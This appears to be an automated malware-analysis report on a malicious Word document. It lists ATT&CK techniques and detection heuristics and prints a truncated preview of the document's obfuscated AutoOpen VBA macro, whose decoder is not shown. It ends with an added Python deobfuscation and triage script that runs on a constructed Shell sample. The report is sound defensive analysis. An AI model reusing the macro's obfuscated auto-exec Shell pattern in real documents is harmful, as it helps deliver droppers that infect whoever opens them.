Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. An AutoOpen macro is present and calls Shell(), so an arbitrary command line is executed as soon as the document is opened; this is the usual entry point for downloading and executing a further payload. The strings in the VBA script are obfuscated (the visible code assembles them by slicing the output of a decoder routine, WoumqwXRB, which is called but not defined within the preview), so the payload's destination and function could not be determined from the extracted source.
Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6355576-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the "no modern VBA project was recovered" wording conflicts with the OLE_VBA_MACROS finding and the macros.bas artifact extracted from this same sample; treat this marker as corroborating the AutoOpen execution surface rather than as a second, separate macro project.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI that any document with drawing content carries; it is not a network indicator and should not be added to a blocklist.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10881 bytes | 4b1d137e2c50c3a4e37c4f78365eb33fd7fd794fd5811b988a8bca8188f0a3de |

Preview: first 1,000 lines of the extracted script (cut off at the point marked "(truncated)")

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub CLdQAMorf()
djshhbABYzj = "8LYMD35ZORSUWNJuzkihwitojjwKmvhNzUXhBqjjRPViiTwfHH5VVG8BGKK"
zYRoasGOV = Mid(djshhbABYzj, 15, 36)
kEBmYwjan = zYRoasGOV
fvCDVzMJbt = "IOU7atLbFiLunuisqSbOtASqXWIaJamDqtDFG2G6A4IBR5CLT70B34"
WuznKh = Mid(fvCDVzMJbt, 5, 30)
iLBjzip = WuznKh
uikcXOlLLR = "P2LGQlRCfRStiawtqEOXNuzDqwVKjOWOWENScEWTM0AVGQ74KSOG"
mvzUOMrajN = Mid(uikcXOlLLR, 3, 37)
wapAdQE = mvzUOMrajN
HbhndCu = "KF24XFEY43K38R9IHRJYdPUUuboKmULDUYfrXdUbsGAwQhJI3OO89EKCD"
JjJCoLw = Mid(HbhndCu, 21, 27)
QVwRq = JjJCoLw
EcjmWr = "SBAAIGEG2WOHjZzHOojkLVuVEwjZTwsbVrvcZFowZNKVSiNLpjmPEAHJwnzzwrQzinmsdUhIzhKzLZCajVjnJdWUkmfmEZYVO35HCIJPQ4MP7GTP332O"
nwPRQHo = Mid(EcjmWr, 10, 83)
izAhjafaYzs = nwPRQHo
oddBUmFP = "RGrBiwMqfsUiVwdPXqJwXkYNbHdnBRRHqovCHfcAwiXiOmOofNziboIChdaaSZpNaNrhDbIrP90Z6R0RJ87Z70U9NIALGYAG30SUJC5Y20M4"
ZjFSvTHBnLB = Mid(oddBUmFP, 2, 71)
tslrDXRXanm = ZjFSvTHBnLB
RPorTm = "VH1C23VR5WV7C02juBpGMwsDXiCClaCnMIPTQGWRuEWaMdQlhfcMEqqsDRmzLUcvCaGUpCToiYLIbSqtSZMY6JB5T9"
hkhYwEUYoOD = Mid(RPorTm, 16, 66)
uuNiHkNNm = hkhYwEUYoOD
hHGYHEjPO = "54EQUGwqiVSWQwTYFabbXmXwwiLnhjihRlasiuzVzLskBSmUVGSlhzuDWWUqvKIBqkFiXRB8JIDUWXVX1QLV74KGF7UZ"
STzPYhGz = Mid(hHGYHEjPO, 4, 66)
JTVtEHKWp = STzPYhGz
BQwiqn = "4JOQNHwvMGJbUiJicqzErhmzknoADllSfrIDtdQkt2JEF7XSMSWE528W9EGLO7JD"
GvVMYp = Mid(BQwiqn, 4, 38)
GHWlWwf = GvVMYp
azCCrGizW = "" + CbHdwK + SYidK + ppljY + vklljZwj + KHWDfw + rrETtarf + wOViTJC + sMjRqa + boHRMaiG + wubFvVtF + kKbFzBFB + TNjBQ + "com" + "ments" + CbHdwK + SYidK + ppljY + vklljZwj + KHWDfw + rrETtarf + wOViTJC + sMjRqa + boHRMaiG + wubFvVtF + kKbFzBFB + TNjBQ + TSlkO + VkOnVO + PzrpMqq + YVrFMKQL + zospInRm
ZpvJvGnPB = Right(Left((WoumqwXRB(azCCrGizW)), 7912), 49)
YhovFWkcLD = Mid((WoumqwXRB(azCCrGizW)), 11750, 55)
NNUjQjZbN = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 11806), 110)
YkQadj = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 12631), 55)
lQNBcTfnE = Right(Left((WoumqwXRB(azCCrGizW)), 10981), 5)
LcjHhv = Mid((WoumqwXRB(azCCrGizW)), 2468, 56)
WfcwcVTQ = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 9632), 94)
wHwDTERzMr = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 4037), 141)
vUPArkoci = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 14596), 115)
GkDJT = Mid((WoumqwXRB(azCCrGizW)), 14214, 28)
IDUwIERII = Right(Left((WoumqwXRB(azCCrGizW)), 3133), 122)
hjjNlkIhci = Mid((WoumqwXRB(azCCrGizW)), 6897, 54)
iGRFqSQu = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 207), 28)
jjJQzM = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 4400), 116)
ibImBvSsw = Right(Left((WoumqwXRB(azCCrGizW)), 9142), 133)
lJAZc = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 3954), 70)
qzapslrTCA = Right(Left((WoumqwXRB(azCCrGizW)), 2426), 129)
mwWtvGS = Right(Left((WoumqwXRB(azCCrGizW)), 7744), 42)
WmzTw = Mid((WoumqwXRB(azCCrGizW)), 11514, 1)
FfJjfE = Mid((WoumqwXRB(azCCrGizW)), 5203, 124)
ItjXuh = Right(Left((WoumqwXRB(azCCrGizW)), 10014), 15)
odjFPPE = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 13243), 45)
onUMdV = Mid((WoumqwXRB(azCCrGizW)), 3575, 148)
fNXrXpiaLl = Right(Left((WoumqwXRB(azCCrGizW)), 6363), 24)
vBXdTJqQ = Mid((WoumqwXRB(azCCrGizW)), 4853, 77)
paqXqRBwiXm = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 91), 78)
TVbQnwi = Mid((WoumqwXRB(azCCrGizW)), 10778, 99)
CvNmQqtUf = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 996), 144)
iYwAA = Left(Right((WoumqwXRB(azCCrGizW)), Len((WoumqwXRB(azCCrGizW))) - 6294), 42)
YNGflQm = Right(Left((WoumqwXRB(azCCrGizW)), 1615), 27)
ssCRIt = Mid((WoumqwXRB(azCCrGizW)), 7033, 61)
uJDAKFKr = Right(Left((WoumqwXRB(azCC ... (truncated)
```
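The macro above hides its real strings behind two layers: short decoy chains (a literal, a Mid() slice of it, and a copy that is never used again) and slices of the output of an unseen decoder routine, WoumqwXRB. The following added example (not the analyzer's code and not part of the report) does the two things an analyst wants to do with such a preview: resolve the Mid/Left/Right slices with VBA's 1-based semantics so the decoy chains collapse and the names that still depend on the decoder are listed, and run the auto-exec plus execution-token check that the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics describe. The PAGE_SNIPPET lines are copied from the preview; TRIAGE_SAMPLE is a constructed macro, not from the analysed document. The resolver walks a parsed expression with an allow-list instead of calling eval(), so no unknown function from the malware is ever executed.

```python
"""Added example (not the analyzer's code): resolve the Mid/Left/Right
string slicing used by the extracted macro and apply the same auto-exec /
execution-token triage the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics
describe. PAGE_SNIPPET is copied from the macro preview; TRIAGE_SAMPLE is
constructed for illustration."""
import ast
import re

# VBA string functions are 1-based and clamp out-of-range lengths.
def vba_mid(s, start, length=None):
    if start < 1:
        raise ValueError("Mid: Start must be >= 1")
    if length is None:
        return s[start - 1:]
    if length < 0:
        raise ValueError("Mid: Length must be >= 0")
    return s[start - 1:start - 1 + length]

def vba_left(s, n):
    if n < 0:
        raise ValueError("Left: Length must be >= 0")
    return s[:n]

def vba_right(s, n):
    if n < 0:
        raise ValueError("Right: Length must be >= 0")
    return s[max(len(s) - n, 0):]       # n >= Len(s) returns the whole string

_FUNCS = {"Mid": vba_mid, "Left": vba_left, "Right": vba_right, "Len": len}

def resolve(expr, env):
    """Evaluate one VBA slicing expression without eval(). The macro's syntax
    (calls, string/int literals, + and -) also parses as a Python expression,
    so ast.parse yields a tree we walk with an allow-list. Anything else,
    including the macro's own decoder WoumqwXRB, raises so no unknown code
    path is ever executed."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, str)):
            return node.value
        if isinstance(node, ast.Name):
            if node.id not in env:
                raise KeyError(node.id)
            return env[node.id]
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub)):
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Add) and type(left) is type(right):
                return left + right      # VBA "+" concatenates strings too
            if isinstance(left, int) and isinstance(right, int):
                return left - right
            raise TypeError("mixed operand types")
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in _FUNCS and not node.keywords):
            return _FUNCS[node.func.id](*(walk(a) for a in node.args))
        raise ValueError("unsupported construct: " + type(node).__name__)
    return walk(ast.parse(expr.strip(), mode="eval").body)

_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")

def resolve_assignments(vba_source):
    """Walk 'name = expr' lines top to bottom, resolving each one whose inputs
    are already known. Returns (env, unresolved): the recovered strings and
    the names that still depend on something unknown (here the decoder)."""
    env, unresolved = {}, []
    for line in vba_source.splitlines():
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, expr = m.groups()
        try:
            env[name] = resolve(expr, env)
        except (KeyError, ValueError, TypeError, SyntaxError):
            unresolved.append(name)
    return env, unresolved

def dead_stores(vba_source):
    """Names assigned but never read again: the decoy chains in this macro
    (kEBmYwjan and friends) land here and can be dropped before reading the
    real decoder logic."""
    assigned, read = [], set()
    for line in vba_source.splitlines():
        m = _ASSIGN.match(line)
        if m:
            assigned.append(m.group(1))
            read.update(re.findall(r"\w+", m.group(2)))
        else:
            read.update(re.findall(r"\w+", line))
    return [n for n in assigned if n not in read]

_AUTOEXEC = re.compile(r"\b(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Workbook_Open)\b", re.I)
_EXEC = re.compile(r"\b(Shell|ShellExecute|CreateObject|WScript\.Shell|URLDownloadToFile)\b", re.I)

def triage(vba_source):
    """The combination OLE_VBA_AUTOOPEN + OLE_VBA_SHELL encode: an auto-exec
    entry point together with an execution token in the same source."""
    auto = sorted({m.group(1) for m in _AUTOEXEC.finditer(vba_source)})
    execs = sorted({m.group(1) for m in _EXEC.finditer(vba_source)})
    return {"autoexec": auto, "exec": execs, "suspicious": bool(auto and execs)}

# Lines copied from the macro preview in this report.
PAGE_SNIPPET = '''\
djshhbABYzj = "8LYMD35ZORSUWNJuzkihwitojjwKmvhNzUXhBqjjRPViiTwfHH5VVG8BGKK"
zYRoasGOV = Mid(djshhbABYzj, 15, 36)
kEBmYwjan = zYRoasGOV
ZpvJvGnPB = Right(Left((WoumqwXRB(azCCrGizW)), 7912), 49)
'''

# Constructed sample, not from the analysed document.
TRIAGE_SAMPLE = '''\
Sub AutoOpen()
    p = Mid("xxcmd.exe /c whoamixx", 3, 17)
    Shell p, vbHide
End Sub
'''

if __name__ == "__main__":
    env, unresolved = resolve_assignments(PAGE_SNIPPET)
    print(env, unresolved, dead_stores(PAGE_SNIPPET), triage(TRIAGE_SAMPLE), sep="\n")
```

Run against the full macros.bas, every name that resolves is a decoy and every name in the unresolved list hangs off WoumqwXRB; the next step is to locate that routine in the remainder of the source (past the preview) and feed its output into the same resolver, at which point the 49-, 55- and 110-character slices become the real command strings.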